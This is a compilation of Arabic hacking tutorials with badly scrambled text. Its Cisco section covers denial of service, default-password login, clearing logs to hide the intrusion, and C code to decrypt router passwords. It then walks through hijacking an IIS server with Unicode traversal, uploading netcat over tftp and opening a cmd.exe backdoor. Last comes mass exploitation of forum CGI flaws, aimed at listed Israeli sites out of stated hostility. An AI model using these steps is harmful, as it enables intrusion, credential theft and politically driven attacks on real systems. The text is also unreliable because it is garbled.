بیحدد وجھة الحزمة والھیدر ده ھو اللي header ,بتحتوي على حاجة اسمھاوھو ده تفسیر انتقال البیانات عبر , لالجھزة االخرى على الشبكة في طريقھا

في حزم الداتا بیحتوي على اي بي header نعرف ان الـ وضروري, االنترنت وعلى فكره انت تقدر تكتب بنفسك, المصدر مرسل ھذه الحزمة او الجھاز

packet مصدر اخر غیر المصدر االصلي اللي مناو حزمة وتجعلھا كأنھا قادمةروت او اي صالحیات طلعت منه وبالتالي تقدر تحصل على صالحیات ادمین او

بتستخدم علشان تعمل العملیة دي الزم تكون.. لكن خلي بالك ... انت عايزھا ولكن ده مش... لینیكس حیث انه بیوفرلك اداوت تقدر تنفذ بیھا الطريقة دي

. ليموضوعنا الحا

--------------------------------------------- IP :للـ spoof كیف تقوم بعمل-

ودول ھايعملو على DC IS ..او Genius 2حاول ان تحصل على برنامج مثلجھازك على النت يعني ھايتغیر جزء من عنوان IdentD ,,تزوير االيدينت بتاعك

اللي حیث يمكنك الرجوع الى الروم IRC وبأمكانك استعمال الطريقة دي على, انت باند فیھا وذلك عن طريق تغییر االيدينت كما يمكنك استخدام عملیة ال

spoof حیث ... اثناء محاولة الحصول على صالحیات روت على االجھزة االخرى المزور ھايكون االي بي logs ھايتخزن في ملفات الـ ان االي بي اللي

--------------------------------------------- Telnet :باستخدام كیف اقوم-

ثم Start Menu ببساطه عن طريق الذھاب الى telnet بأمكانك تشغیل الـ Telnet ثم تكتب في المربع Run تختار

font و buffer size ھنا تقدر تغیر Preferences > Terminal ,اضغط علىوفي حالت فتح " local echo . "او اغالق فتحكما تستطیع ايضا, واشیاء اخرى

شيء تكتبه في نافذة التلنت فسیكون بأمكانك رؤية كل local echo او تشغیل . كما سیكون بمقدورك رؤية مايكتبه االخرون في الحال

364

23اللي ھو رقم telnet port في الغالب يكون التلنیت متظبط على انه يتصل بـر رقم البورت في حالة رغبتك في االتصال على اية ولكن انت بمقدورك تغیی ,

FTP لخمدة ال21 بتاع المیل او بورت رقم 25اخر مثل بورت رقم خدمة او بورتيوجد االالف من المنافذ لذا يجب تحديد وجھتك قبل ,,,, وغیرھا من البورتات

. االتصال---------------------------------------------

HyperTerminal :دمكیف استخ-

HyperTerminal يقوم بفتح" server "لیقوم على اي بورت في جھازك باالستماع الى المعلومات القادمة الى جھازك من االجھزة االخرى اللي انت

تحددھا Accessories > Programs > Start <اذھب الى HyperTerminal ولتشغیل

. HyperTerminal > Communications البداية يجب علیك اختیار نوع في ثم حدد الھوست او االي بي ثم " IP Winsock/TCP "لذا قم بأختیار .. االتصال

وتقدر تخلي البرنامج على وظیفة االستماع Call ..اتصال او حدد البورت واعمل المعلومات القادمة من اجھزة اخرى عن طريق اختیار الستقبال listening او, r Call Wait fo> Call تستطیع عمل كما Chat او نقل للملفات عن طريق ھذا

البرنامج---------------------------------------------

Ping :كیف استفید من-

DOS - MSكل اللي علیك انك تفتح نافذة, تعتبر من ابسط االدوات Ping اداةprompt ثم تقوم بكتابة, " address.ping ip "ة ھايعمل بنج ثالث مرات في العاد

: ولكن انت بأمكانك كتابة, يتوقف ثم"t-address .ping ip"

: اكتب.. ولتغییر حجم حزمة البنج المرسلة , بدون توقف وده يخلیه يعمل بنج"address.ip) size(l -ping "

بتحديده ثم ھي عبارة عن ارسال حزمة داتا الى جھاز معین تقوم Ping وعملیة وتقدر تستفید من الموضوع ده في, رد على الحزمة اللي انت ارسلتھا ترى ال

ايضا يمكنه ان يقوم بتھنیج الجھاز او Ping و الـ. معرفة سرعة االتصال للجھاز اي ارسال حزم كثیرة ذات احجام ping floods انھیاره وذلك عن طريق عمل

ممكن ينھار بعد . Windows 98وبدون توقف الى احد االجھزة كبیرة بسرعة

365

وذلك الن البنج يقوم بأستھالك حجم , علیه ping flood دقیقة واحده فقط من . الى قطع االتصال او تھنیج النظام ممكن يؤدي bandwidth كبیر من الـ

الكبیرة زي سیرفرات مواقع ضد االھداف Ping flooding واحب اوضح ان عملیة مثال يكون غیر مجدي وغیر فعال

ولكن يعني عمل بنج , البنج ال يعني انه فلوود حقیقي مع - tاختیار : مالحظةيمكنك Linux او Unix جمیع توزيعات بینما في. للھدف بصورة مستمرة

وفعال لعمل فلووود بنج حقیقي f - pingاستخدام الخاصیة---------------------------------------------

TraceRoute :كیف استخدم-

لتقوم يعني مثال, تستخدم لتتبع جھاز او اي بي معین TraceRoute عملیةكل اللي علیك انك , بتتبع اتصالك لكي تعرف االجھزة اللي بینك وبین الھدف

وسوف " address.tracert ip "ثم تقوم بكتابةDOS prompt - MSنافذة تفتحومن خالل الحكاية دي . باالجھزة اللي بینك وبین الجھاز الھدف تظھر لك قائمة

internet service ( ISPموجوده او تحديد firewalls تقدر تحدد اذا كان فیه) providerالي شخص

لكي يسھل TraceRoute بشرح مبسط وموجز لمیكانیكیة عمل وساقوم االن : علیك فھمھا

على اي بي او جھاز معین فیقوم جھازك TraceRoute قیامك بأمر اوال عند, بتاع الحزمة header تحتوي على قیمة معینة في الـIP packet / TCPبارسال

وعند مرور الحزمة Time To Live .لـ وھي اختصار TTL ھذه القیمة تسمىبمقدار واحد عند كل راوتر او جھاز TTL على االجھزة والراوترات فتنقص قیمة الـ

في اي حاجه سواء معین الن احیانا يحصل خطأ.. والحكاية دي مھمة جدا , الشبكة في الحزمة او االجھزة مما يؤدي الى ان الحزمة تفضل ماشیة في

ولھذا عندنا ينقص bandwidth ,بدون توقف وتقوم باستھالك كمیة كبیرة من الـبأرسال ICMP فتموت الحزمة ويقوم بروتوكول.. ويصل الى الصفر TTL مقدار الـ خطأ الى مرسل الحزمة رسالةمرسلھا عند ذا لم يوجد اخطاء فأن الحزمة ستقوم بأرسال رسالة الىاما ا

مرورھا على كل جھاز او راوتر الى ان تصل الى الجھاز الھدف TraceRoute تكونو فھمتو على االقل الفكرة العامة للـ اتمنى

---------------------------------------------

366

proxy server :كیف استعمل- اللي على البورت proxy server بالبحث في شبكة االنترنت عن اي منقم

او telnet وعندما تجد احدھا قم باالتصال به عن طريق, انت عاوزه hyperterminal او غیرھا وبعد كده قم باالتصال بأجھزة اخرى من خالل ھذا

لك احد عنوان االي بي الحقیقي البروكسي وبكده فلن يعرف

==============================================

؟ cisco router لماذا اقوم بأختراق : الفصل االول-

؟ cisco router اقوم بأختراق لماذا.. اعتقد ان البعض ھايسأل نفسه ولكن لو ھو حدد .. وانا عارف ان البعض يقوم باالختراق بھدف التخريب بس

اللي رف ممكن يستفید من النظامالھدف المنشود من عملیة االختراق وع خلونا نشوف ايه الفايدة من اختراق... اخترقه ازاي فسوف يختلف الوضع تماما

cisco routers اتصال راوترات سیسكو تتمیز بسرعة عالیة جدا حیث انھا تستخدم نظام: اوال 181 T واحنا شرحنا الدرس اللي فات وظیفة راوترات سیسكو , الفائق السرعةيعني تخیل مثال ان راوتر خارج منه العديد من خطوط ... ربط الشبكات يف

طالع منه خطوط تانیه الجھزة ISP وكل سیرفر او ISP سیرفرات او االنترنت الىاللي الزم يكون علیھا الراوتر علشان يقدر يمد كل اخرى فتخیل السرعة

انك تقدر تستخدم اذن نستنتج من ھنا ... االجھزة دي بالسرعة الالزمة لھابیكون مؤثر اذا كان الھجوم له اللي DENIAL OF SERVICE الراوتر في ھجوم

اخرى من خالل الراوتر سرعة عالیة زي الراوتر كده كما تستطیع اختراق انظمة خدمة الـ زي ماوضحنا قبل كده في الدرس اللي فات وذلك عن طريق استغالل

Telnet الموجودة في الراوتر . او الحزم تمر عبر وخالل ھذا packets يجب ان تعرف ان ھناك االف من الـايضا

ھذه الحزم ثم تقوم بعمل الراوتر وبالتالي تستطیع ان تقوم بالتقاط بعضdecoded و و و و لھا ورؤية كل المعلومات السرية والخاصة والباسوردات ....

التي تمر عبر الراوترزي trusted systems رات سیسكو ھيواضیفلك معلومة كمان وھي ان راوت

المحلیة اللي بتديك اكسس وصالحیات في الشبكة rsh و rcp اداوت يونیكس

367

) شغلك على االجھزة اللي موجودة في الشبكة بتاعتھا وبالتالي تقدر تشوف راجع الدرس اللي كتبته بعنوان rsh و rcp للمزيد من المعلومات عن اداوت

Network Services )

--------------------------------------------------------------------- ؟ cisco router كیف اعثر على: الفصل الثاني -

دائما مايكون لدى , عملیة بسیطة وقانونیة عملیة ايجاد راوتر سیسكو ھينوع سیسكو وتقدر انت راوتر خاص به و معظم ھذه الراوترات تكون من ISP اي

مستخدم على اي traceroute عنوان اي بي الراوتر عن طريق انك تعملتجیب وبعد ماتعمل ISP (شرحنا فوق عملیة( معین ISP من مستخدمي

traceroute الـ على IP فسیقوم باظھار كل االجھزة وااليبیھات اللي بینك وبینهنا ھنا اي واحنا يھم... واي بي الراوتر بتاعه وغیره ISP ومن ضمنھم اي بي الـ

: وده مثال, بي الراوتر بس 222.222.22.22tracert

]221.223.24.54[Tracing route to . hops30over a maximum of ]222.222.22.21[isp .ms your132ms 122ms 147 1 ]222.222.22.20[firewall .ms isp123ms 143ms 122 2 ].33.44.22207[com .ms aol122MS 142ms 3 156

Request timed out * * * 4 ]194.33.44.33[router .ms cisco133ms 102ms 101 5 ]111.11.11.11[ip .ms something102ms 143ms 233 6 ]122.11.21.21[com .ms netcom213ms 123ms 222 7 ]121.21.21.33[net .tts.ms blahblah212ms 211ms 152 8 s 'target<<< ] 121.22.32.43[m co.34.ms altavista243ms 223ms 9 122

isp com .34.altavista.221.223.24.54ms 132ms 122ms 101 10

] 221.223.24.54[ .Trace complete

تشوفه قم بتحويل المثال الى الیسار علشان تقدر نالحظ عند الجھاز الخامس انه راوتر سیسكو

368

وتر يكون محمي بـلكن احتمال ان الرا, وعنوانه دلوئتي انت حددت الراوترfirewall علشان كده الزم تبعتله بنج Ping فلو طلع فیه رد , مرتین وتنتظر الرد

اما لو لقیت مفیش رد firewall اذن ده مؤشر ان الراوتر معلیھوش حماية مناالي بي بتاعك اتعمله بلوك وان firewall يبئى تعرف ان الراوتر علیه حماية من

من الراوتراو الء ھي انك تفتح التیلنت وتشبك firewall ة لمعرفت ان كان يوجدطرقة تانی

طلعلك حاجه بتقولك ادخل فلو.... عادي 23على الراوتر عن طريق البورت رقم اما لو طلعلك , الراوتر اذن تعرف انك دلوئتي على.. الباسورد ومفیش يوزر نیم

دلوئتي موجود داخل انترسالة بتقولك ادخل الیوزر نیم والباسورد فتعرف ان الفاير وول

على راوتر مش محمي دورلك.. من االخر كده علشان تريح دماغي ودماغك المھم دلوئتي اول . ويبئى لینا لقاء تاني عن موضوع الفايروول ده, من فايروول

بالبحث عن ابدء.. ماتالقي راوتر كويس كده و ابن حالل ومعلیھوش فايروول proxy server علشان االي بي بتاعك ال23سمح باالتصال عن طريق البورت ي

للراوتر LOGs يتم تسجیله في ملفات الـ

--------------------------------------------------------------------- والدخول الیه cisco router كیف اقوم بكسر: الفصل الثالث -

على الجھاز اللي software .1 4 vتقوم بتشغیل نظام معظم راوترات سیسكوتشبك على الراوتر عن طريق التیلنت فبأمكانك انك. يعتبر ضعیف الحماية

: مثل ھذه ثم تقوم بأدخال باسورد كبیرة وطويلة23بالبورت

1029384 dsk019qpwoeirutyalskdjfhgzmxncbv10293847465w qp10293847465dsk019qpwoeirutyalskdjfhgzmxncbv7465

qpwoeiruty 10293847465dsk019oeirutyalskdjfhgzmxncbvqpwoeirutyalskdjf 10293847465dsk019alskdjfhgzmxncbv

qpwoeirutyalskdjfhgzmxnc 10293847465dsk019hgzmxncbvds 019qpwoeirutyalskdjfhgzmxncbv10293847465dsk019bv

dsk019qpwoeirutyalskdjfhgzmxncbv10293847465k

طبعا مش , او ريستارات reboot الراوتر يحصله فیه احتمال ان.. ر قلیال انتظلكن غالبا مش ھايحصله ريستارت . دي في الحالة offline ھاتقدر تخترقه النه

369

دقايق وفي الفترة 10-2تمتد من او يھنج لفتره freeze انما ھاتحصله عملیة.. دي انت الزم تعمل على اختراق الراوتر

v 4 1.اي حاجه غیر كده فذلك يعني ان نظام تشغیل الراوتر لیس صلاما لو ح.. software والحل؟, الباسورد الطويلة ان تنجح معاه وان

زي مثال فلووود بنج .. الراوتر على DOS في الحالة دي ممكن تستخدم ھجوموده ھايجیب نفس " t-ip .router.cisco56550 l -ping " ,روح للدوس واكتب, تائج اللي في الحالة االولىالن

قم بفتح كونكشن او اتصال .. او تھنیج frozen حالة دلوئتي واثناء الراوتر فيالزم يكون بروكسي يختلف عن االول ( اخر تاني مع الراوتر عن طريق بروكسي

ممكن واحد يسأل ويقول لماذا لم " admin .... "وبعد كده اكتب الباسورد دي) سورد من االول ؟يتم استخدام الباالغلب راوترات default password ھذه الباسورد ھي الـ والسبب ھو ان

او تھنیج فأنه يعد نفسه على frozen في حالة وعندما يكون الراوتر, سیسكو بتاعه default وضع الـ

الزم تعرف ان , دخولك الى الراوتر يجب علیك طلب ملف الباسورد واالن وبعد prompt سیسكو متعدده ولیس نظام واحد ولكن الـ وتراتانظمة تشغیل را

علشان " ?"االن قم بكتابة " : textil-htl " ,الشائع لھا غالبا مايكون زي كدهحاول تبحث عن , كبیرة من االوامر تظھر قائمة االوامر وطبعا ھاتظھرلك قايمة

ورد على ملف الباس ثم استخدمه للحصول transfer command ..امر النقل IP عنوان ثم قم بأرسال الملف الى) خلي بالك انك االدمین حالیا ( لالدمین

ولكن قبل ان ترسل الملف الى جھازك يجب ان .. 23الخاص بك على البورت : االتي تعمل

( تم شرح البرنامج في اول الموضوع HyperTerminal )قم بتشغیل برنامجيعني .. من راوتر سیسكو r a call wait foوبعد تشغیله قم بجعله على وضع

. البرنامج على وضعیة الترقب النتظار اشارة من عنوان راوتر سیسكو تخلي فسوف يقوم برنامج.. ماتقوم بأرسال الملف من الراوتر ودلوئتي اول

HyperTerminal تريد استقبل الملف المرسل من الراوتر بسؤالك ان كنت ,.. وقبل ماتخرج من الراوتر وتفصل . لھارد عندكواحفظ الملف على ا yes اختار

وذلك عن طريق كتابة علشان محدش يعرف انك دخلت history قم بمسح الـ " 0history size"االمر التالي في التريمینال

Logout وبعد كده اعمل ... وبكده اقدر اقولك انك خلصت اھم الجزء االصعب واالھم في الموضوع كله

علشان تستعد لكسر الباسورد اللي حصلت وية دلوئتيتقدر تستريح ش علیھا

370

----------------------------------------------------------------------

؟ cisco router كیف اقوم بكسر الباسوردات لـ: الفصل الرابع -

قمت بأحضار ملف الباسورد الى جھازك فأنت محتاج لكسره لكي واالن وبعد ان. تمنحك الصالحیات الكاملة لدخول الراوتر مرة اخرى تمتلك الباسوردات اللي

او اي برنامج اخر John the Ripper مثل خدام برنامجقم بأست.. ولعمل ذلك . لكسر الباسوردات

والطريقة االخرى ھي فك تشفیر الملف . وانا انصح بھا دي تعتبر اسھل طريقةوممكن عن .. ويوجد منھا الكثیر .. التشفیر وسوف تحتاج الى برامج فك,

اسورداتالتشفیر وكسر الب طريق االكواد البرمجیة التي تقوم بفك compile علیك تعمله وانت. وده كود يقوم بفك تشفیر باسورد راوترات سیسكو

تحت نظام يونیكس او لینیكس بالطريقة السلیمة لرؤية الكود Shift + Ctliاعمل

>h.stdio<include # >h.ctype<include # {[] = char xlat ,f6x0, 66x0, b6x0, b3x0, 64x0, 66x0, 73x0, 64x0

72,x0, 77x0, 65x0, 79x0, 69x0, e2x0, c2x0, 41x0 44x0, b4x0, a4x0, 64x0, c6x0, b6x0 }; ; "7password [] = "1str_char pw ; "7password -enable[] = "2str_char pw ;pname*char )pw_dec, pw_enc(cdecrypt ;pw_enc*char ;pw_dec*char

371

{ ;0= val , i, unsigned int seed )1& ) pw_enc(strlen(if ;)1-(return ';0 '-] 1[pw_enc + 10) * '0 '-] 0[pw_enc= (seed

]))1[pw_enc(isdigit!|| ]) 0[pw_enc(isdigit! || 15> seed (if ;)1-(return {++) i; )pw_enc(strlen= <i ; 2= i (for {)) 1& i !( && 2!=i (if ;++]seed[ xlat^val ] = 2-2 / i [pw_dec ;0= val } ;16*= val {]))) i[pw_enc(toupper] = i[pw_enc(isdigit(if ';0 '-] i[pw_enc+= val ;continue } {) 'F'= <] i[pw_enc' && A'= >] i[pw_enc(if ;10+ ' A '-] i[pw_enc+= val ;continue } )i) != pw_enc(strlen(if ;)1-(return } ;0] = 2 / i[++pw_dec

372

;)0(return } ()usage { ;)pname, "n\>encrypted password<p -s : %Usage", stdout(fprintf ;)pname, "n\>output file> <router config file<s " %, stdout(fprintf ;)0(return } )argv,argc(main ;int argc ;argv**char { ;stdout= out *, stdin= in *FILE ;]257[char line ;]65[char passwd ;pos_pw, unsigned int i ;]0[argv= pname )1> argc (if { {) 3> argc (if ;()usage ;)1(exit } )'-'] == 0][1[argv(if { {]) 1][1[argv(switch

373

:'h'case ;()usage ;break :'p'case {)) passwd, ]2[argv(cdecrypt(if ;")n\.Error", stderr(fprintf ;)1(exit } ;)passwd, "n\s: %password", stdout(fprintf ;break :default ;)pname, ."unknow option: s"%, stderr(fprintf } ;)0(return } )NULL")) == rt", ]1[argv(fopen= in ((if ;)1(exit )2> argc (if )NULL")) == wt", ]2[argv(fopen= out ((if ;)1(exit } {) 1(while {++) i; 256< i ; 0= i (for {) EOF)) == in(fgetc] = i[line((if )i(if ;break ;)in(fclose ;)out(fclose

374

;)0(return } )'r\'] == i[line(if ;--i )'n\'] == i[line(if ;break } ;0= pos _pw ;0] = i[line )))1str_pw(strlen, 1str_pw, line(strncmp(!if ;)1str_pw(strlen= pos _pw

)))2str_pw(strlen, 2str_pw, line(strncmp(!if ;)2str_pw(strlen= pos _pw {) pos_pw(!if ;)line, "n\s"%, stdout(fprintf ;continue } {)) passwd, ]pos_pw[line&(cdecrypt(if ;")n\.Error", stderr(fprintf ;)1(exit } {else ))1str_pw(strlen= =pos _pw(if ;)1str_pw, "s"%, out(fprintf

else ;)2str_pw, "s"%, out(fprintf ;)passwd, "n\s"%, out(fprintf }

375

} }

فالطريقة الوحیدة ھي استخدام برنامج زي Linux لم تكن تمتلك نظام اما اذاJohn the Ripper اي برنامج كسر باسورد اخر او .

---------------------------------------------

John the Ripper لتحمیل برنامج/john/com.openwall.www://http

-------------------------------------------

ويرقايمة بأشھر اوامر راوترات سیسكو واللي موجوده في جمیع السوفت ودي بتاعتھا

Session number to resume> 99-1< List entry-enable Create a temporary Access-access

profile to interface-profile Apply user-access clear Reset functions

connect Open a terminal connection disable Turn off privileged commands

ect an existing network connectiondisconnect Disconn enable Turn on privileged commands

exit Exit from the EXEC help Description of the interactive help system

lock Lock the terminal login Log in as a particular user

logout Exit from the EXEC mls exec mls router commands

info Request neighbor and version information from a multicast mrrouter

mstat Show statistics after multiple multicast traceroutes

376

mtrace Trace reverse multicast path from destination to source connection Name an existing network connection-name

PAD connection29.pad Open a X ping Send echo messages

)PPP(Point Protocol -to-ppp Start IETF Point resume Resume an active network connection

rlogin Open an rlogin connection )not config(set Set system parameter

show Show running system information )SLIP(line IP -slip Start Serial

systat Display information about terminal lines telnet Open a telnet connection

terminal Set terminal line parameters traceroute Trace route to destination

tunnel Open a tunnel connection where List active connections

PAD28 .Become an X28 x parameters on PAD3. Set X3x

377

) NetCat(اختراق السیرفرات عن طريق النت كات

Death. Dr:للكاتب

واالختراق بواسطتھا net cat الیوم بنتكلم عن موضوع خطیر جدا اداة النت كات.

لكن يمكن , ھي فالحقیقه موجوده فالیونكس , البرنامج اداه من ادوات الدوس . لتعامل معھاللويندوز وا انزلھا

و TCP اتصاالت الشبكات النت كات عباره عن اداه قابلة للكتباه والقرائه عبر. UDP

التنصت على البورتات , سكان مثال بورت, ولھا استخدامات كثیره جدا و خطیره . والعمل باك دور,

: لتحمیل النت كات من ھناzip.netcat/hack/harleymotor/uk.co.lycos.members.www://http

: شي بستعرض بعض اھم اوامر النت كات اول

e specifies a program to exec after-

receiving a connection/making 8up to , ]s[routing hop point-g gateway source-

12, 8, 4: routing oiter-G num source- ports scanned, i secs delay interval for lines sent-

l listen mode for inbound connections- no DNS, n only accept numeric IP addresses-

o file hex dump of traffic- p port local port number-

r randomize- ource addresss addr local s-

t netcat will respond to telnet option negotiation- this allows it to connect to a telnetd and"

get past initial negotiation far enough to get "a login prompt from the server

u UDP connection mode-

378

v verbose mode- onnects timeout for c-w secs wait -

]used for scanning[O mode /z zero I- .plus a few others, all of the above options exist, For NT netcat

t open a new DOS window' don-d detach - L keep listening after the current session terminates-

وات الي يجب ان نقوم والخط, كات بنتكلم عن طريق االختراق بواسطة النت

: بھا : اوال البورت سكان-

: z –v –ncتقدر تسوي سكان على البورتات عن طريق ھذا االمر200-1 192.168.1.90

: 192.168.1.90z – 2w–v –nc 1-200او االمر ھذا

بورت ھذا ھو ايبي الجھاز او الموقع الي تبغي تسوي علیه1.168192. 90. . سكان

: pingمثال ping , .طبعن علشان تطلع ايبي الموقع سو له/com.drdeathx.www://http

اذا ماصار تجاوب , مثال انا اخترت ثانیتین , ھذا لتحديد مدة االتصالW 2االمر . اختصار للوقت, يروح على البورت الي بعده

1انا اخترت البورتات من , ھذي ھي البورتات الي سوينا سكان بینھم 1- 200 200. الى

379

. بورت المتصفح والتلنت واالف تي بي وغیرھم, طلعت لنا شوفو النتئائج شو . ومكتوب حذالھم البورت مفتوح وله ال

: ثانیا االتصال بالبورتات-

اياھا مثل المعلومات الي يعطینا, مثال عندنا موقع ونبغي نطلع معلومات عنه com.netcraft.www://http/ موقع

: 192.168.1.90n –v –nc 80نكتب االمر ھذا, بكل بساطه

على ولطع لنا ان الموقع شغال , 80 و 21الحین طلعنا معلومات عن البورت FTP و فیه میكورسوفتIIS 5 0..سیرفر وعلى 2000ويندوز

. بتفیدنا في تحديد الھدف لالختراق حلو ھذي معلومات

. بنخترق الموقع, العملي وبنبدا فالتطبیق, الحین بنشتغل شغل اجمد

نحمل النت كات على طبعن الزم. بنخلي النت كات يفتح لنا باك دور فالموقع كیف ؟؟. دور الموقع اول شي علشان يفتح لنا الباك

بنستخدم سكربتات الیونیكود الخطیره في IIS 5 0. ,الموقع على سیرفر بما ان . رفعه

380

مثل ما تشوفون استخدمنا السكربتc+dir+c/?exe.cmd/32system/winnt../c5/..%scripts/.90.1.168192://http

ripts Scعن طريق المجلد C ,الستعراض محتويات الدرايف

: Program Files , Inetpub , Documents and Settings ,وطلعت لنا النتائجWINNT

IIS النت كات على سیرفر الحین بنرفع, حلو tftp ,في الدوس اكتب, ھذي االداه مشابھه لالف تي بي tftp ,بنستخدم ال

. اذا تبغي تعرف المزيد عنھا : نرجع الى موضوعنا

381

بدل لكن, نفس السكربت االولي , شوفو االسكربت الي حطیناه ھذي المره : i-[TFTP [ھذي ھي طريقه, وطبقناه tftp , امرحطینا dir ,امر االستعراض

]destination[source ] PUT| GET [host : exe. get nc192.168.1.90I –tftpنحن في اختراقنا ھذا الي سويناه

+ طبعن في اسكربتات الیونیكود بدل المسافه نكتب exe.nc+GET+.9.1.168192+i-+TFTP+c:///http : فتصیر بھذا الشكل

يطلع لك اذا النت كات انرفع بنجاح للسیرفرTFTPD 32 ,اسمه في برنامج رائع : وصلة البرنامج

zip..27232tftpd/download/jounin.philippe/fr.wanadoo.ersop://http net.jounin.32tftpd://http/ : البرنامج موقع

382

نبغي , بعد ما رفعنا النت كات وكل شي تمام, الحین بنبدا فالشغل الحلو ) Back Door. (نخلي النت كات يفتح لنا باك دور

دور الزم نخلیه فاالول يتنصت على بورت فالسیرفر علشان نخلیه يفتح لنا الباكخدام بنقدر نتصل بالبورت من جھازنا بست بعدين , 10001مثال اخترت البورت ,

. النت كات

: 10001p -L -nc -ھذا ھو االمر, التنصت من السیرفر انزين الحین بنطبق امرexe.e cmd-d

383

: االوامر ھذي الي كتبناھا نشرح شوية

: Nc يخلي الويندوز يشغل النت كاتexe. nc : L -يخبر النت كات بان ال يغلق وان ينتظر االنتصال : p -علیه صنتلتحديد البورت الي بنت . : d -يخبر النت كات بالتصال بالبرنامج الي نريد ان نشغله : e -النت كات بالبرنامج الي نريده ان يشتغل بعد االتصال بالبورت يخبر .

exe. cmdالدوس طبعن نحن اخترنا

: الشكل طبعن بیكون بھذا, الحین بنكتب االمر في سكربت الیونیكود exe.cmd+e-+d-+10001+p-+L-+nc+c:///http

: شوفو الصوره

على وفتح لنا باك دور , 10001النت كات تنصت على البورت , الحین تمام exe. cmdالدوس

. على السیرفر علشان نتصل من جھازنا على النت كات الي, الحین يا دورنا

384

10001, بعد ما اتصلنا بالبورت المتنصتین علیه, الحین مثل ما مالحظین 192.168.1.90n –v – nc 10001باالمر

والنتیجه انه ipconfig ,وطبقنا االمر, فالسیرفر الي scripts دخلنا على ملف

) ^_^(طلع لنا ايبي السیرفر . الحین تمام صار عندنا تحكم بعید على السیرفر

كیف ؟؟, الملفات بواسطة النت كات الحین نبغي ننقللكن , ثانیه عن طريق الیونیكود لكن الزم نسويھا مره TFTP ,نقدر عن طريق ال

وعندنا اتصال خارجي لیش نحن خالص تعاملنا الحین مع النت كات وھو افضل . معاه

اذا كان فالسیرفر ملف مثال, اول شي امر استقبال او سحب ملف من السیرفر

: 1234p –l –nc بنطبق ھذا االمر, ونبغي نسحبه txt . hack ,اسمهtxt.hack>

. ھذا ھو البورت الي بنستخدمه في سحب الملف 1234

385

كیف ؟؟, واذا حبینا انا نرفع ملف للسیرفر , انزين : C, ^txt .hack <1234 192.168.1.90ncاالمر عن طريق ھذا

شي تمام ونتاكد ان كل dir ,نستعرض محتوايات المجلد باالمر, الحین تمام . وان الملف انرفع

! ,txt.hack !نستخدم االمر, علشان نشغل الملف في السیرفر و

386

... والعملیه تمت بنجاح, مبروك علیك االختراق

387

ماھو االختراق العشوائي

Kandor:للكاتب Random Hackingـإختراق العشوائي ال ماھو- CGIScripts تطويره بحیث يصبح يبحث على إستثمارات غییر الـ - كیف تستغل اي ثغره بعد الحصول علیھا- Random Hackingg ماھو الـإختراق العشوائي -

ھو البحث في كمیه كبیره من المواقع عن ثغره محدده ، وھذا سھل ويعود ه لإلختراق ، مثال بسیط جدا ، روح على محرك بحث ، بمواقع كثیره جدا جاھز

com.altavista أو العناكب مثل spidersمن محركات البحث التي تعتمد على الـ مثال نبحث ) إرجع لشرح زورو في رياضیات البحث( ، cgi or pl.xxxx:linkوأكتب

یجه المواقع المردوده لك نتcgi .help ،cgi.help:linkعن لنك لملف بإسم ، إفتح واحد منھا وأبحث في المصدر Ikonboardللبحث كلھا تملك منتدى

لتعرف اين مكانه ، لنفرض cgi.help عن السكربت الذي بحثت عنه HTMLالكود cgi.help/bin-cgi/com.example.www://httpمكانه ھنا

cgi/com.example.www://http-أكتب بعد الملف غیر العنوان لیصبح 00%cgi].member/[members=../helpon?cgi.help/bin

طبعا[] بإسم عضو وبدون القوسین ] member[مع مالحظه تغییر سوف يعرض لك معلومات العضو كامله ومن ظمنھا كلمة المرور وھذه الثغره لـ

وھذا لیس لب موضوعي ولكن ھي بدايه ومثال ال 7.12Ikonboard.المنتدى فقط فیوجد غیره مئات بل آالف ملفات الـ تحفظه ألني أحضرت أبسط مثال

CGIScript تملك ثغرات مثل ھذه واغلب إستثماراتھا تكون من خالل url للحصول على مثل ھذه اإلستثمارات لثغرات ملفات السي جي آي سكريبت

شوف األرشیف ھذا وھو لغته روسیه أعتقد ولكن ما يھم ألننا نبحث عن الـ Exploitأو اإلستثمار

bugs/ver_eng/com.s2f.secure.www://tpht/ وممكن تأخذ إسم المنتج مثال وتضعه في محرك البحث لـ

com.securiteam.www://http / وتشوف النتائج ، أو تشترك في القائمه البريدهلـ سیكیورتي فوكس فھي مفیده جدا أنا شاركت من قبل فتره وجدا أعجبت بھا

ات السي جي آي سكربت ، يعني امن وھي مختصه في األمن ولیس لـثغرويوجد برنامج تقدمه سیكیورتي فوكسي بإسم .... واخبار وكل شئ

388

سیكیورتي فوكس بیجر ، ھو برنامج لتسھیل عملیه الحصول على األخبار الخ...ووو

CGIScripts تطويره بحیث يصبح يبحث على إستثمارات غییر الـ -

ائي ، يعني تخترق اي موقع ولو بدون اإلختراق العشوائي إذا كان فعال عشو، لكن ممكن نستفید منه إحنا في أنه ما يكون في !! سبب فھذه ھمجیه

شكل ھمجي ، أنا اقول لك كیف ، مثال إسرائیل اللي الكل يكرھھا ، الذين ، الكل يكرھھم لیس ألجل أنھم :) يأمرون الفلسطینیین بأوقاف إطالق النار

ظلموا فلسطین ، عندھم موقع فیه آالف من مواقعھم يھود ، ال نكرھھم ألنھم sites 70 و il.org تنتھي بـ sites 1104 و il.co تنتھي بـ sites 12610ھذا ھو

تنتھي بـ . sites 54 وھذه مھمه ، و il.govتنتھي بـ . sites 78 و il.acتنتھي بـ il.net 29 و sites . تنتھي بـil.muni 2009 و sites تنتھي بـ mco 137 ، و sites .

net .israel- 84 لعینه ، . sites 4 -eduو . sites 121 -org و netتنتھي بـ sites . و sites-il ........ . عشان تحصل على كل ھذه السايت روح الموقع ھذاhtm.sites/sites/il.co.iguide://http

وفیه كمان محركات بحث

il.co.achla.www://http/ 1=dw?vs.index/data/il.co.reshet.www://http il.co.maven.www://http/ il.co.tapuz.www://http/ il.co.walla.www://http/

pl.find/il.gov.info.www://http

il.co.altavistaوفیه محرك أعدم منھا واللي ھو

المھم على كل شخص منا أن يصلح فرز للبیانات الموجوده في ھذه المواقع ، م اللغه التي يتقنھا لیصنع برنامج يصلح فرز ويضعھا في ملف تكست يستخد

بدون اشیاء ثانیه معھا

389

، الطريقه / msql-3wالعملیه الثانیه ھي البحث فیھا كلھا عن منتج ، مثال وثم sa .net.isp.proxy:8080سھله جدا ، أوال يتم الشبك مع بروكسي مثال

ي ، مثال ترسل للبروكسGETيرسل له أمر .01/HTTP/ msql-3w/bin-cgi/il.com.www://GET http

pjpeg/image, jpeg/image, xbitmap-x/image, gif/image: Accept ,*/* sa-ar: Language-Accept 98Windows ; .55MSIE ; compatible(.0 4/Mozilla: Agent-User(

il.com.www: Host Alive-Keep: Connection-Proxy

